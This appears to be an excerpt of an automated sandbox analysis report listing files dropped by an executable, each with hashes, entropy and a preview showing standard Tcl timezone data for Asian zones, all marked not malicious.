                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                              MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                              SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                              SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                              SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2121
                                                                                                                                                                                                                              Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                              MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                              SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                              SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                              SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2055
                                                                                                                                                                                                                              Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                              MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                              SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                              SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                              SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1664
                                                                                                                                                                                                                              Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                              MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                              SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                              SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                              SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                              MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                              SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                              SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                              SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                              MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                              SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                              SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                              SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):273
                                                                                                                                                                                                                              Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                              MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                              SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                              SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                              SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                              MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                              SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                              SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                              SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1668
                                                                                                                                                                                                                              Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                              MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                              SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                              SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                              SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                              MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                              SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                              SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                              SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                              MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                              SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                              SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                              SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
                                                                                                                                                                                                                              MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                              SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                              SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                              SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                              MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                              SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                              SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                              SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                              MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                              SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                              SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                              SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                              MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                              SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                              SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                              SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                                              Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                              MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                              SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                              SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                              SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
